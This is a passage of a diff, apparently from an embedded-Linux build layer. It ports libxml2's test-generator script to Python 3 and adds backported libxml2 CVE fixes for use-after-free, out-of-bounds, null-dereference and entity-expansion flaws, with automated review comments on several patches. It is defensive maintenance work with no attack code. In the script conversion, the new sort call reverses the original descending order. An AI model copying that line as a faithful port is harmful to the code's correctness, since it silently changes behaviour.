++ info = arg.xpathEval("string(@info)")
++ nam = arg.xpathEval("string(@name)")
+ type = type_convert(rtype, nam, info, module, name, n)
+- if is_known_param_type(type) == 0:
+- add_missing_type(type, name);
+- no_gen = 1
++ if is_known_param_type(type) == 0:
++ add_missing_type(type, name);
++ no_gen = 1
+ if (type[-3:] == 'Ptr' or type[-4:] == '_ptr') and \
+- rtype[0:6] == 'const ':
+- crtype = rtype[6:]
+- else:
+- crtype = rtype
+- t_args.append((nam, type, rtype, crtype, info))
++ rtype[0:6] == 'const ':
++ crtype = rtype[6:]
++ else:
++ crtype = rtype
++ t_args.append((nam, type, rtype, crtype, info))
+
+ try:
+- rets = node.xpathEval("return")
++ rets = node.xpathEval("return")
+ except:
+ rets = []
+ t_ret = None
+ for ret in rets:
+ rtype = ret.xpathEval("string(@type)")
+- info = ret.xpathEval("string(@info)")
++ info = ret.xpathEval("string(@info)")
+ type = type_convert(rtype, 'return', info, module, name, 0)
+- if rtype == 'void':
+- break
+- if is_known_return_type(type) == 0:
+- add_missing_type(type, name);
+- no_gen = 1
+- t_ret = (type, rtype, info)
+- break
++ if rtype == 'void':
++ break
++ if is_known_return_type(type) == 0:
++ add_missing_type(type, name);
++ no_gen = 1
++ t_ret = (type, rtype, info)
++ break
+
+ if no_gen == 0:
+ for t_arg in t_args:
+@@ -733,7 +733,7 @@ test_%s(void) {
+
+ if no_gen == 1:
+ add_missing_functions(name, module)
+- test.write("""
++ test.write("""
+ /* missing type support */
+ return(test_ret);
+ }
+@@ -742,22 +742,22 @@ test_%s(void) {
+ return
+
+ try:
+- conds = node.xpathEval("cond")
+- for cond in conds:
+- test.write("#if %s\n" % (cond.get_content()))
+- nb_cond = nb_cond + 1
++ conds = node.xpathEval("cond")
++ for cond in conds:
++ test.write("#if %s\n" % (cond.get_content()))
++ nb_cond = nb_cond + 1
+ except:
+ pass
+
+ define = 0
+- if function_defines.has_key(name):
++ if name in function_defines:
+ test.write("#ifdef %s\n" % (function_defines[name]))
+- define = 1
++ define = 1
+
+ # Declare the memory usage counter
+ no_mem = is_skipped_memcheck(name)
+ if no_mem == 0:
+- test.write(" int mem_base;\n");
++ test.write(" int mem_base;\n");
+
+ # Declare the return value
+ if t_ret != None:
+@@ -766,29 +766,29 @@ test_%s(void) {
+ # Declare the arguments
+ for arg in t_args:
+ (nam, type, rtype, crtype, info) = arg;
+- # add declaration
+- test.write(" %s %s; /* %s */\n" % (crtype, nam, info))
+- test.write(" int n_%s;\n" % (nam))
++ # add declaration
++ test.write(" %s %s; /* %s */\n" % (crtype, nam, info))
++ test.write(" int n_%s;\n" % (nam))
+ test.write("\n")
+
+ # Cascade loop on of each argument list of values
+ for arg in t_args:
+ (nam, type, rtype, crtype, info) = arg;
+- #
+- test.write(" for (n_%s = 0;n_%s < gen_nb_%s;n_%s++) {\n" % (
+- nam, nam, type, nam))
++ #
++ test.write(" for (n_%s = 0;n_%s < gen_nb_%s;n_%s++) {\n" % (
++ nam, nam, type, nam))
+
+ # log the memory usage
+ if no_mem == 0:
+- test.write(" mem_base = xmlMemBlocks();\n");
++ test.write(" mem_base = xmlMemBlocks();\n");
+
+ # prepare the call
+ i = 0;
+ for arg in t_args:
+ (nam, type, rtype, crtype, info) = arg;
+- #
+- test.write(" %s = gen_%s(n_%s, %d);\n" % (nam, type, nam, i))
+- i = i + 1;
++ #
++ test.write(" %s = gen_%s(n_%s, %d);\n" % (nam, type, nam, i))
++ i = i + 1;
+
+ # add checks to avoid out-of-bounds array access
+ i = 0;
+@@ -797,7 +797,7 @@ test_%s(void) {
+ # assume that "size", "len", and "start" parameters apply to either
+ # the nearest preceding or following char pointer
+ if type == "int" and (nam == "size" or nam == "len" or nam == "start"):
+- for j in range(i - 1, -1, -1) + range(i + 1, len(t_args)):
++ for j in (*range(i - 1, -1, -1), *range(i + 1, len(t_args))):
+ (bnam, btype) = t_args[j][:2]
+ if btype == "const_char_ptr" or btype == "const_xmlChar_ptr":
+ test.write(
+@@ -806,42 +806,42 @@ test_%s(void) {
+ " continue;\n"
+ % (bnam, nam, bnam))
+ break
+- i = i + 1;
++ i = i + 1;
+
+ # do the call, and clanup the result
+- if extra_pre_call.has_key(name):
+- test.write(" %s\n"% (extra_pre_call[name]))
++ if name in extra_pre_call:
++ test.write(" %s\n"% (extra_pre_call[name]))
+ if t_ret != None:
+- test.write("\n ret_val = %s(" % (name))
+- need = 0
+- for arg in t_args:
+- (nam, type, rtype, crtype, info) = arg
+- if need:
+- test.write(", ")
+- else:
+- need = 1
+- if rtype != crtype:
+- test.write("(%s)" % rtype)
+- test.write("%s" % nam);
+- test.write(");\n")
+- if extra_post_call.has_key(name):
+- test.write(" %s\n"% (extra_post_call[name]))
+- test.write(" desret_%s(ret_val);\n" % t_ret[0])
++ test.write("\n ret_val = %s(" % (name))
++ need = 0
++ for arg in t_args:
++ (nam, type, rtype, crtype, info) = arg
++ if need:
++ test.write(", ")
++ else:
++ need = 1
++ if rtype != crtype:
++ test.write("(%s)" % rtype)
++ test.write("%s" % nam);
++ test.write(");\n")
++ if name in extra_post_call:
++ test.write(" %s\n"% (extra_post_call[name]))
++ test.write(" desret_%s(ret_val);\n" % t_ret[0])
+ else:
+- test.write("\n %s(" % (name));
+- need = 0;
+- for arg in t_args:
+- (nam, type, rtype, crtype, info) = arg;
+- if need:
+- test.write(", ")
+- else:
+- need = 1
+- if rtype != crtype:
+- test.write("(%s)" % rtype)
+- test.write("%s" % nam)
+- test.write(");\n")
+- if extra_post_call.has_key(name):
+- test.write(" %s\n"% (extra_post_call[name]))
++ test.write("\n %s(" % (name));
++ need = 0;
++ for arg in t_args:
++ (nam, type, rtype, crtype, info) = arg;
++ if need:
++ test.write(", ")
++ else:
++ need = 1
++ if rtype != crtype:
++ test.write("(%s)" % rtype)
++ test.write("%s" % nam)
++ test.write(");\n")
++ if name in extra_post_call:
++ test.write(" %s\n"% (extra_post_call[name]))
+
+ test.write(" call_tests++;\n");
+
+@@ -849,32 +849,32 @@ test_%s(void) {
+ i = 0;
+ for arg in t_args:
+ (nam, type, rtype, crtype, info) = arg;
+- # This is a hack to prevent generating a destructor for the
+- # 'input' argument in xmlTextReaderSetup. There should be
+- # a better, more generic way to do this!
+- if string.find(info, 'destroy') == -1:
+- test.write(" des_%s(n_%s, " % (type, nam))
+- if rtype != crtype:
+- test.write("(%s)" % rtype)
+- test.write("%s, %d);\n" % (nam, i))
+- i = i + 1;
++ # This is a hack to prevent generating a destructor for the
++ # 'input' argument in xmlTextReaderSetup. There should be
++ # a better, more generic way to do this!
++ if info.find('destroy') == -1:
++ test.write(" des_%s(n_%s, " % (type, nam))
++ if rtype != crtype:
++ test.write("(%s)" % rtype)
++ test.write("%s, %d);\n" % (nam, i))
++ i = i + 1;
+
+ test.write(" xmlResetLastError();\n");
+ # Check the memory usage
+ if no_mem == 0:
+- test.write(""" if (mem_base != xmlMemBlocks()) {
++ test.write(""" if (mem_base != xmlMemBlocks()) {
+ printf("Leak of %%d blocks found in %s",
+- xmlMemBlocks() - mem_base);
+- test_ret++;
++\t xmlMemBlocks() - mem_base);
++\t test_ret++;
+ """ % (name));
+- for arg in t_args:
+- (nam, type, rtype, crtype, info) = arg;
+- test.write(""" printf(" %%d", n_%s);\n""" % (nam))
+- test.write(""" printf("\\n");\n""")
+- test.write(" }\n")
++ for arg in t_args:
++ (nam, type, rtype, crtype, info) = arg;
++ test.write(""" printf(" %%d", n_%s);\n""" % (nam))
++ test.write(""" printf("\\n");\n""")
++ test.write(" }\n")
+
+ for arg in t_args:
+- test.write(" }\n")
++ test.write(" }\n")
+
+ test.write(" function_tests++;\n")
+ #
+@@ -882,7 +882,7 @@ test_%s(void) {
+ #
+ while nb_cond > 0:
+ test.write("#endif\n")
+- nb_cond = nb_cond -1
++ nb_cond = nb_cond -1
+ if define == 1:
+ test.write("#endif\n")
+
+@@ -900,10 +900,10 @@ test_%s(void) {
+ for module in modules:
+ # gather all the functions exported by that module
+ try:
+- functions = ctxt.xpathEval("/api/symbols/function[@file='%s']" % (module))
++ functions = ctxt.xpathEval("/api/symbols/function[@file='%s']" % (module))
+ except:
+- print "Failed to gather functions from module %s" % (module)
+- continue;
++ print("Failed to gather functions from module %s" % (module))
++ continue;
+
+ # iterate over all functions in the module generating the test
+ i = 0
+@@ -923,14 +923,14 @@ test_%s(void) {
+ # iterate over all functions in the module generating the call
+ for function in functions:
+ name = function.xpathEval('string(@name)')
+- if is_skipped_function(name):
+- continue
+- test.write(" test_ret += test_%s();\n" % (name))
++ if is_skipped_function(name):
++ continue
++ test.write(" test_ret += test_%s();\n" % (name))
+
+ # footer
+ test.write("""
+ if (test_ret != 0)
+- printf("Module %s: %%d errors\\n", test_ret);
++\tprintf("Module %s: %%d errors\\n", test_ret);
+ return(test_ret);
+ }
+ """ % (module))
+@@ -948,7 +948,7 @@ test.write(""" return(0);
+ }
+ """);
+
+-print "Generated test for %d modules and %d functions" %(len(modules), nb_tests)
++print("Generated test for %d modules and %d functions" %(len(modules), nb_tests))
+
+ compare_and_save()
+
+@@ -960,11 +960,8 @@ for missing in missing_types.keys():
+ n = len(missing_types[missing])
+ missing_list.append((n, missing))
+
+-def compare_missing(a, b):
+- return b[0] - a[0]
+-
+-missing_list.sort(compare_missing)
+-print "Missing support for %d functions and %d types see missing.lst" % (missing_functions_nr, len(missing_list))
++missing_list.sort(key=lambda a: a[0])
++print("Missing support for %d functions and %d types see missing.lst" % (missing_functions_nr, len(missing_list)))
+ lst = open("missing.lst", "w")
+ lst.write("Missing support for %d types" % (len(missing_list)))
+ lst.write("\n")
+@@ -974,9 +971,9 @@ for miss in missing_list:
+ for n in missing_types[miss[1]]:
+ i = i + 1
+ if i > 5:
+- lst.write(" ...")
+- break
+- lst.write(" %s" % (n))
++ lst.write(" ...")
++ break
++ lst.write(" %s" % (n))
+ lst.write("\n")
+ lst.write("\n")
+ lst.write("\n")
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2016-3709.patch b/meta/recipes-core/libxml/libxml2/CVE-2016-3709.patch
new file mode 100644
index 0000000000..5301d05323
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2016-3709.patch
@@ -0,0 +1,89 @@
+From c1ba6f54d32b707ca6d91cb3257ce9de82876b6f Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Sat, 15 Aug 2020 18:32:29 +0200
+Subject: [PATCH] Revert "Do not URI escape in server side includes"
+
+This reverts commit 960f0e275616cadc29671a218d7fb9b69eb35588.
+
+This commit introduced
+
+- an infinite loop, found by OSS-Fuzz, which could be easily fixed.
+- an algorithm with quadratic runtime
+- a security issue, see
+ https://bugzilla.gnome.org/show_bug.cgi?id=769760
+
+A better approach is to add an option not to escape URLs at all
+which libxml2 should have possibly done in the first place.
+
+CVE: CVE-2016-3709
+Upstream-Status: Backport [https://github.com/GNOME/libxml2/commit/c1ba6f54d32b707ca6d91cb3257ce9de82876b6f]
+Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
+---
+ HTMLtree.c | 49 +++++++++++--------------------------------------
+ 1 file changed, 11 insertions(+), 38 deletions(-)
+
+diff --git a/HTMLtree.c b/HTMLtree.c
+index 8d236bb35..cdb7f86a6 100644
+--- a/HTMLtree.c
++++ b/HTMLtree.c
+@@ -706,49 +706,22 @@ htmlAttrDumpOutput(xmlOutputBufferPtr buf, xmlDocPtr doc, xmlAttrPtr cur,
+ (!xmlStrcasecmp(cur->name, BAD_CAST "src")) ||
+ ((!xmlStrcasecmp(cur->name, BAD_CAST "name")) &&
+ (!xmlStrcasecmp(cur->parent->name, BAD_CAST "a"))))) {
++ xmlChar *escaped;
+ xmlChar *tmp = value;
+- /* xmlURIEscapeStr() escapes '"' so it can be safely used. */
+- xmlBufCCat(buf->buffer, "\"");
+
+ while (IS_BLANK_CH(*tmp)) tmp++;
+
+- /* URI Escape everything, except server side includes. */
+- for ( ; ; ) {
+- xmlChar *escaped;
+- xmlChar endChar;
+- xmlChar *end = NULL;
+- xmlChar *start = (xmlChar *)xmlStrstr(tmp, BAD_CAST "<!--");
+- if (start != NULL) {
+- end = (xmlChar *)xmlStrstr(tmp, BAD_CAST "-->");
+- if (end != NULL) {
+- *start = '\0';
+- }
+- }
+-
+- /* Escape the whole string, or until start (set to '\0'). */
+- escaped = xmlURIEscapeStr(tmp, BAD_CAST"@/:=?;#%&,+");
+- if (escaped != NULL) {
+- xmlBufCat(buf->buffer, escaped);
+- xmlFree(escaped);
+- } else {
+- xmlBufCat(buf->buffer, tmp);
+- }
+-
+- if (end == NULL) { /* Everything has been written. */
+- break;
+- }
+-
+- /* Do not escape anything within server side includes. */
+- *start = '<'; /* Restore the first character of "<!--". */
+- end += 3; /* strlen("-->") */
+- endChar = *end;
+- *end = '\0';
+- xmlBufCat(buf->buffer, start);
+- *end = endChar;
+- tmp = end;
++ /*
++ * the < and > have already been escaped at the entity level
++ * And doing so here breaks server side includes
++ */
++ escaped = xmlURIEscapeStr(tmp, BAD_CAST"@/:=?;#%&,+<>");
++ if (escaped != NULL) {
++ xmlBufWriteQuotedString(buf->buffer, escaped);
++ xmlFree(escaped);
++ } else {
++ xmlBufWriteQuotedString(buf->buffer, value);
+ }
+-
+- xmlBufCCat(buf->buffer, "\"");
+ } else {
+ xmlBufWriteQuotedString(buf->buffer, value);
+ }
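Review bot: The `else` fallback in the restored URI-attribute branch of htmlAttrDumpOutput writes `value` rather than `tmp`, so when xmlURIEscapeStr() returns NULL the attribute goes out with its leading blanks and with no URI escaping at all. The success path skips the blanks and escapes, so the two paths produce different output for the same input and the failure is silent. If the backport may deviate from upstream here, `xmlBufWriteQuotedString(buf->buffer, tmp);` would at least keep the blank-skipping consistent; otherwise add a comment such as `/* escape failed (likely OOM): value is written unescaped */`. The function body starts and ends outside the inner hunk.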
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2021-3516.patch b/meta/recipes-core/libxml/libxml2/CVE-2021-3516.patch
new file mode 100644
index 0000000000..200f42091e
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3516.patch
@@ -0,0 +1,35 @@
+From 1358d157d0bd83be1dfe356a69213df9fac0b539 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Wed, 21 Apr 2021 13:23:27 +0200
+Subject: [PATCH] Fix use-after-free with `xmllint --html --push`
+
+Call htmlCtxtUseOptions to make sure that names aren't stored in
+dictionaries.
+
+Note that this issue only affects xmllint using the HTML push parser.
+
+Fixes #230.
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/1358d157d0bd83be1dfe356a69213df9fac0b539]
+CVE: CVE-2021-3516
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ xmllint.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/xmllint.c b/xmllint.c
+index 6ca1bf54d..dbef273a8 100644
+--- a/xmllint.c
++++ b/xmllint.c
+@@ -2213,7 +2213,7 @@ static void parseAndPrintFile(char *filename, xmlParserCtxtPtr rectxt) {
+ if (res > 0) {
+ ctxt = htmlCreatePushParserCtxt(NULL, NULL,
+ chars, res, filename, XML_CHAR_ENCODING_NONE);
+- xmlCtxtUseOptions(ctxt, options);
++ htmlCtxtUseOptions(ctxt, options);
+ while ((res = fread(chars, 1, pushsize, f)) > 0) {
+ htmlParseChunk(ctxt, chars, res, 0);
+ }
+--
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2021-3517.patch b/meta/recipes-core/libxml/libxml2/CVE-2021-3517.patch
new file mode 100644
index 0000000000..e88a8ae7c6
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3517.patch
@@ -0,0 +1,53 @@
+From bf22713507fe1fc3a2c4b525cf0a88c2dc87a3a2 Mon Sep 17 00:00:00 2001
+From: Joel Hockey <joel.hockey@gmail.com>
+Date: Sun, 16 Aug 2020 17:19:35 -0700
+Subject: [PATCH] Validate UTF8 in xmlEncodeEntities
+
+Code is currently assuming UTF-8 without validating. Truncated UTF-8
+input can cause out-of-bounds array access.
+
+Adds further checks to partial fix in 50f06b3e.
+
+Fixes #178
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/bf22713507fe1fc3a2c4b525cf0a88c2dc87a3a2]
+CVE: CVE-2021-3517
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ entities.c | 16 +++++++++++++++-
+ 1 file changed, 15 insertions(+), 1 deletion(-)
+
+diff --git a/entities.c b/entities.c
+index 37b99a56..1a8f86f0 100644
+--- a/entities.c
++++ b/entities.c
+@@ -704,11 +704,25 @@ xmlEncodeEntitiesInternal(xmlDocPtr doc, const xmlChar *input, int attr) {
+ } else {
+ /*
+ * We assume we have UTF-8 input.
++ * It must match either:
++ * 110xxxxx 10xxxxxx
++ * 1110xxxx 10xxxxxx 10xxxxxx
++ * 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
++ * That is:
++ * cur[0] is 11xxxxxx
++ * cur[1] is 10xxxxxx
++ * cur[2] is 10xxxxxx if cur[0] is 111xxxxx
++ * cur[3] is 10xxxxxx if cur[0] is 1111xxxx
++ * cur[0] is not 11111xxx
+ */
+ char buf[11], *ptr;
+ int val = 0, l = 1;
+
+- if (*cur < 0xC0) {
++ if (((cur[0] & 0xC0) != 0xC0) ||
++ ((cur[1] & 0xC0) != 0x80) ||
++ (((cur[0] & 0xE0) == 0xE0) && ((cur[2] & 0xC0) != 0x80)) ||
++ (((cur[0] & 0xF0) == 0xF0) && ((cur[3] & 0xC0) != 0x80)) ||
++ (((cur[0] & 0xF8) == 0xF8))) {
+ xmlEntitiesErr(XML_CHECK_NOT_UTF8,
+ "xmlEncodeEntities: input not UTF-8");
+ if (doc != NULL)
+--
+GitLab
+
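Review bot: The new condition in xmlEncodeEntitiesInternal stays in bounds only because of the order of its `||` operands, and nothing in the comment says so. `cur[2]` and `cur[3]` are read only after the preceding byte was confirmed to be a `10xxxxxx` continuation byte, so a terminating 0 ends the chain (assuming `input` is NUL-terminated, which is not visible in this hunk). I would record that next to the check, e.g. `/* Order matters: cur[n] is read only if cur[n-1] was a continuation byte, so the terminator is never passed. */`, and reword the now inaccurate `We assume we have UTF-8 input.` since the code validates it. The check covers byte structure only: overlong forms such as a `0xC0` lead byte still pass it, and whether later code rejects them cannot be told from here.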
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2021-3518.patch b/meta/recipes-core/libxml/libxml2/CVE-2021-3518.patch
new file mode 100644
index 0000000000..40d3debea1
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3518.patch
@@ -0,0 +1,112 @@
+From ac82a514e16eb81b4506e2cba1a1ee45b9f025b5 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Wed, 10 Jun 2020 16:34:52 +0200
+Subject: [PATCH 1/2] Don't recurse into xi:include children in
+ xmlXIncludeDoProcess
+
+Otherwise, nested xi:include nodes might result in a use-after-free
+if XML_PARSE_NOXINCNODE is specified.
+
+Found with libFuzzer and ASan.
+
+Upstream-Status: Backport [from fedora: https://bugzilla.redhat.com/show_bug.cgi?id=1954243]
+
+The upstream patch 752e5f71d7cea2ca5a7e7c0b8f72ed04ce654be4 has been modified,
+as to avoid unnecessary modifications to fallback files.
+
+CVE: CVE-2021-3518
+Signed-off-by: Jasper Orschulko <Jasper.Orschulko@iris-sensing.com>
+---
+ xinclude.c | 24 ++++++++++--------------
+ 1 file changed, 10 insertions(+), 14 deletions(-)
+
+diff --git a/xinclude.c b/xinclude.c
+index ba850fa5..f260c1a7 100644
+--- a/xinclude.c
++++ b/xinclude.c
+@@ -2392,21 +2392,19 @@ xmlXIncludeDoProcess(xmlXIncludeCtxtPtr ctxt, xmlDocPtr doc, xmlNodePtr tree) {
+ * First phase: lookup the elements in the document
+ */
+ cur = tree;
+- if (xmlXIncludeTestNode(ctxt, cur) == 1)
+- xmlXIncludePreProcessNode(ctxt, cur);
+ while ((cur != NULL) && (cur != tree->parent)) {
+ /* TODO: need to work on entities -> stack */
+- if ((cur->children != NULL) &&
+- (cur->children->type != XML_ENTITY_DECL) &&
+- (cur->children->type != XML_XINCLUDE_START) &&
+- (cur->children->type != XML_XINCLUDE_END)) {
+- cur = cur->children;
+- if (xmlXIncludeTestNode(ctxt, cur))
+- xmlXIncludePreProcessNode(ctxt, cur);
+- } else if (cur->next != NULL) {
++ if (xmlXIncludeTestNode(ctxt, cur) == 1) {
++ xmlXIncludePreProcessNode(ctxt, cur);
++ } else if ((cur->children != NULL) &&
++ (cur->children->type != XML_ENTITY_DECL) &&
++ (cur->children->type != XML_XINCLUDE_START) &&
++ (cur->children->type != XML_XINCLUDE_END)) {
++ cur = cur->children;
++ continue;
++ }
++ if (cur->next != NULL) {
+ cur = cur->next;
+- if (xmlXIncludeTestNode(ctxt, cur))
+- xmlXIncludePreProcessNode(ctxt, cur);
+ } else {
+ if (cur == tree)
+ break;
+@@ -2416,8 +2414,6 @@ xmlXIncludeDoProcess(xmlXIncludeCtxtPtr ctxt, xmlDocPtr doc, xmlNodePtr tree) {
+ break; /* do */
+ if (cur->next != NULL) {
+ cur = cur->next;
+- if (xmlXIncludeTestNode(ctxt, cur))
+- xmlXIncludePreProcessNode(ctxt, cur);
+ break; /* do */
+ }
+ } while (cur != NULL);
+--
+2.32.0
+
+
+From 3ad5ac1e39e3cd42f838c1cd27ffd4e9b79e6121 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Thu, 22 Apr 2021 19:26:28 +0200
+Subject: [PATCH 2/2] Fix user-after-free with `xmllint --xinclude --dropdtd`
+
+The --dropdtd option can leave dangling pointers in entity reference
+nodes. Make sure to skip these nodes when processing XIncludes.
+
+This also avoids scanning entity declarations and even modifying
+them inadvertently during XInclude processing.
+
+Move from a block list to an allow list approach to avoid descending
+into other node types that can't contain elements.
+
+Fixes #237.
+Upstream-Status: Backport
+CVE: CVE-2021-3518
+Signed-off-by: Jasper Orschulko <Jasper.Orschulko@iris-sensing.com>
+---
+ xinclude.c | 5 ++---
+ 1 file changed, 2 insertions(+), 3 deletions(-)
+
+diff --git a/xinclude.c b/xinclude.c
+index f260c1a7..d7648529 100644
+--- a/xinclude.c
++++ b/xinclude.c
+@@ -2397,9 +2397,8 @@ xmlXIncludeDoProcess(xmlXIncludeCtxtPtr ctxt, xmlDocPtr doc, xmlNodePtr tree) {
+ if (xmlXIncludeTestNode(ctxt, cur) == 1) {
+ xmlXIncludePreProcessNode(ctxt, cur);
+ } else if ((cur->children != NULL) &&
+- (cur->children->type != XML_ENTITY_DECL) &&
+- (cur->children->type != XML_XINCLUDE_START) &&
+- (cur->children->type != XML_XINCLUDE_END)) {
++ ((cur->type == XML_DOCUMENT_NODE) ||
++ (cur->type == XML_ELEMENT_NODE))) {
+ cur = cur->children;
+ continue;
+ }
+--
+2.32.0
+
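Review bot: The second patch in this file (PATCH 2/2, the `--xinclude --dropdtd` fix) carries a bare `Upstream-Status: Backport` with no commit or URL, so it cannot be checked against upstream from its header. The first patch links only a Fedora bug and says the upstream change was modified, without listing which parts were dropped beyond "fallback files". For a security backport that is later audited or rebased, I would put the reference in the tag, as CVE-2021-3537.patch in this commit does: `Upstream-Status: Backport [<upstream commit URL>]`. I would also state for PATCH 1/2 exactly which parts of the upstream change were left out.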
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2021-3537.patch b/meta/recipes-core/libxml/libxml2/CVE-2021-3537.patch
new file mode 100644
index 0000000000..9e64c2a36d
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3537.patch
@@ -0,0 +1,50 @@
+From babe75030c7f64a37826bb3342317134568bef61 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Sat, 1 May 2021 16:53:33 +0200
+Subject: [PATCH] Propagate error in xmlParseElementChildrenContentDeclPriv
+
+Check return value of recursive calls to
+xmlParseElementChildrenContentDeclPriv and return immediately in case
+of errors. Otherwise, struct xmlElementContent could contain unexpected
+null pointers, leading to a null deref when post-validating documents
+which aren't well-formed and parsed in recovery mode.
+
+Fixes #243.
+
+Upstream-Status: Backport
+[https://gitlab.gnome.org/GNOME/libxml2/-/commit/babe75030c7f64a37826bb3342317134568bef61]
+CVE: CVE-2021-3537
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ parser.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/parser.c b/parser.c
+index b42e6043..73c27edd 100644
+--- a/parser.c
++++ b/parser.c
+@@ -6208,6 +6208,8 @@ xmlParseElementChildrenContentDeclPriv(xmlParserCtxtPtr ctxt, int inputchk,
+ SKIP_BLANKS;
+ cur = ret = xmlParseElementChildrenContentDeclPriv(ctxt, inputid,
+ depth + 1);
++ if (cur == NULL)
++ return(NULL);
+ SKIP_BLANKS;
+ GROW;
+ } else {
+@@ -6341,6 +6343,11 @@ xmlParseElementChildrenContentDeclPriv(xmlParserCtxtPtr ctxt, int inputchk,
+ SKIP_BLANKS;
+ last = xmlParseElementChildrenContentDeclPriv(ctxt, inputid,
+ depth + 1);
++ if (last == NULL) {
++ if (ret != NULL)
++ xmlFreeDocElementContent(ctxt->myDoc, ret);
++ return(NULL);
++ }
+ SKIP_BLANKS;
+ } else {
+ elem = xmlParseName(ctxt);
+--
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2021-3541.patch b/meta/recipes-core/libxml/libxml2/CVE-2021-3541.patch
new file mode 100644
index 0000000000..1f392b4cd7
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3541.patch
@@ -0,0 +1,73 @@
+From 8598060bacada41a0eb09d95c97744ff4e428f8e Mon Sep 17 00:00:00 2001
+From: Daniel Veillard <veillard@redhat.com>
+Date: Thu, 13 May 2021 14:55:12 +0200
+Subject: [PATCH] Patch for security issue CVE-2021-3541
+
+This is relapted to parameter entities expansion and following
+the line of the billion laugh attack. Somehow in that path the
+counting of parameters was missed and the normal algorithm based
+on entities "density" was useless.
+
+Upstream-Status: Backport
+[https://gitlab.gnome.org/GNOME/libxml2/-/commit/8598060bacada41a0eb09d95c97744ff4e428f8e]
+CVE: CVE-2021-3541
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ parser.c | 26 ++++++++++++++++++++++++++
+ 1 file changed, 26 insertions(+)
+
+diff --git a/parser.c b/parser.c
+index f5e5e169..c9312fa4 100644
+--- a/parser.c
++++ b/parser.c
+@@ -140,6 +140,7 @@ xmlParserEntityCheck(xmlParserCtxtPtr ctxt, size_t size,
+ xmlEntityPtr ent, size_t replacement)
+ {
+ size_t consumed = 0;
++ int i;
+
+ if ((ctxt == NULL) || (ctxt->options & XML_PARSE_HUGE))
+ return (0);
+@@ -177,6 +178,28 @@ xmlParserEntityCheck(xmlParserCtxtPtr ctxt, size_t size,
+ rep = NULL;
+ }
+ }
++
++ /*
++ * Prevent entity exponential check, not just replacement while
++ * parsing the DTD
++ * The check is potentially costly so do that only once in a thousand
++ */
++ if ((ctxt->instate == XML_PARSER_DTD) && (ctxt->nbentities > 10000) &&
++ (ctxt->nbentities % 1024 == 0)) {
++ for (i = 0;i < ctxt->inputNr;i++) {
++ consumed += ctxt->inputTab[i]->consumed +
++ (ctxt->inputTab[i]->cur - ctxt->inputTab[i]->base);
++ }
++ if (ctxt->nbentities > consumed * XML_PARSER_NON_LINEAR) {
++ xmlFatalErr(ctxt, XML_ERR_ENTITY_LOOP, NULL);
++ ctxt->instate = XML_PARSER_EOF;
++ return (1);
++ }
++ consumed = 0;
++ }
++
++
++
+ if (replacement != 0) {
+ if (replacement < XML_MAX_TEXT_LENGTH)
+ return(0);
+@@ -7963,6 +7986,9 @@ xmlParsePEReference(xmlParserCtxtPtr ctxt)
+ xmlChar start[4];
+ xmlCharEncoding enc;
+
++ if (xmlParserEntityCheck(ctxt, 0, entity, 0))
++ return;
++
+ if ((entity->etype == XML_EXTERNAL_PARAMETER_ENTITY) &&
+ ((ctxt->options & XML_PARSE_NOENT) == 0) &&
+ ((ctxt->options & XML_PARSE_DTDVALID) == 0) &&
+--
+GitLab
+
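Review bot: The DTD-state check added to xmlParserEntityCheck runs only when `ctxt->nbentities % 1024 == 0`, which assumes the counter lands on every multiple of 1024. If any caller advances `nbentities` by more than one (those sites are outside this hunk, so confirm), the counter can step over the multiples and the exponential-expansion check may rarely or never fire. A more robust form would compare against a stored last-checked count, which needs new context state; as a backport, at least document the assumption, e.g. `/* relies on nbentities reaching exact multiples of 1024 */`. The comment wording is also off: "Prevent entity exponential check" reads as the opposite of what the code does, and "once in a thousand" does not match the 1024 in the condition.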
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-23308-fix-regression.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-23308-fix-regression.patch
new file mode 100644
index 0000000000..7fc243eec1
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-23308-fix-regression.patch
@@ -0,0 +1,98 @@
+From 646fe48d1c8a74310c409ddf81fe7df6700052af Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Tue, 22 Feb 2022 11:51:08 +0100
+Subject: [PATCH] Fix --without-valid build
+
+Regressed in commit 652dd12a.
+---
+ valid.c | 58 ++++++++++++++++++++++++++++-----------------------------
+ 1 file changed, 29 insertions(+), 29 deletions(-)
+---
+
+From https://github.com/GNOME/libxml2.git
+ commit 646fe48d1c8a74310c409ddf81fe7df6700052af
+
